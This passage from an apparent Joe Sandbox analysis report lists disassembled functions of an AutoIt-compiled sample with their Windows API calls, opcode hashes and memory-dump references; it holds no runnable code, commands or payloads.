                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0vH$HH
                                                                                                                            • API String ID: 0-728391547
                                                                                                                            • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                            • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                                            • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                            • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                                            Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                            • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                                                            • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                            • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                                                            Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Proc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2346855178-0
                                                                                                                            • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                            • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                            • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                            • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                            Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockInput
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3456056419-0
                                                                                                                            • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                            • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                            • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                            • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                            Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LogonUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1244722697-0
                                                                                                                            • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                            • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                            • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                            • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                            Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NameUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2645101109-0
                                                                                                                            • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                            • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                            • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                            • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                            Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3192549508-0
                                                                                                                            • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                            • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                            • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                            • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                            Function 00412C38 Relevance: .4, Instructions: 384COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                            • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                            • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                            Function 00412818 Relevance: .4, Instructions: 378COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                            • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                            • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                            Function 0041240C Relevance: .4, Instructions: 361COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                            • Instruction ID: ac15b8da1a4b082d71a0b082c8349c97121379a14580263daf363e6ab8f75410
                                                                                                                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                            • Instruction Fuzzy Hash: 87C18173C0A9B30A8736812D42641AFEE626FD579031FC3E2CCD47F38A91AB5DA195D4
                                                                                                                            Function 00412038 Relevance: .4, Instructions: 351COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                            • Instruction ID: aa957cafbedeae1199dea6a597ba911d219650f283d164fb65797e90308ef47b
                                                                                                                            • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                            • Instruction Fuzzy Hash: 5FC18E73D0A9B30A8735812D42581AFEE626FD578031EC3E28CE46F38ED26F5DA195D4
                                                                                                                            Function 00410D10 Relevance: .0, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                            • Instruction ID: b8cfd58d412160527e66ace840abba843d94ac3f5b06779728c9fe736b8606cc
                                                                                                                            • Opcode Fuzzy Hash: 304d221b5688423ebfa6c473264aec07cdb78ae451f757bdd5acbbf2c1e92ad4
                                                                                                                            • Instruction Fuzzy Hash: ECD012F621844146F33144D866C0BD100437344310FB58C276005CEBC1C0DDECD6C229
                                                                                                                            Function 00459384 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 480filewindowcomCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                            • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                            • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                            • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                            • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                            • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                            • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                            • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                            • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                            • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                            • _wcslen.LIBCMT ref: 00459800
                                                                                                                            • _wcscpy.LIBCMT ref: 0045981F
                                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                            • GetDC.USER32(?), ref: 004598DE
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                            • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                            • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                            • API String ID: 4040870279-2373415609
                                                                                                                            • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                            • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                            • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                            • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
                                                                                                                            Function 00441E05 Relevance: 49.8, APIs: 33, Instructions: 276COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(00000012), ref: 00441E64
                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00441E6C
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00441E83
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00441E8F
                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00441EAA
                                                                                                                            • SelectObject.GDI32(?,?), ref: 00441EBA
                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00441EF0
                                                                                                                            • GetSysColor.USER32(00000010), ref: 00441EF8
                                                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00441EFF
                                                                                                                            • FrameRect.USER32(?,?,00000000), ref: 00441F10
                                                                                                                            • DeleteObject.GDI32(?), ref: 00441F1B
                                                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00441F75
                                                                                                                            • FillRect.USER32(?,?,?), ref: 00441FB6
                                                                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                              • Part of subcall function 00433D5C: SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                              • Part of subcall function 00433D5C: GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                              • Part of subcall function 00433D5C: GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                              • Part of subcall function 00433D5C: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                              • Part of subcall function 00433D5C: SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                              • Part of subcall function 00433D5C: SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                              • Part of subcall function 00433D5C: SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                              • Part of subcall function 00433D5C: InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                              • Part of subcall function 00433D5C: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                              • Part of subcall function 00433D5C: GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                              • Part of subcall function 00433D5C: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 69173610-0
                                                                                                                            • Opcode ID: 22debf79f4c44a035464754627ba5797adfaa2c58029bf194fe0b59aebe8cdef
                                                                                                                            • Instruction ID: 0b0c06e318eae1aa70623bc76f746578ebcda4f465cb69034399d4c57c44293d
                                                                                                                            • Opcode Fuzzy Hash: 22debf79f4c44a035464754627ba5797adfaa2c58029bf194fe0b59aebe8cdef
                                                                                                                            • Instruction Fuzzy Hash: BBB14D71508300AFD314DF64DD88A6FB7F8FB88720F504A2DF996922A0D774E845CB66
                                                                                                                            Function 00403E50 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 236COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
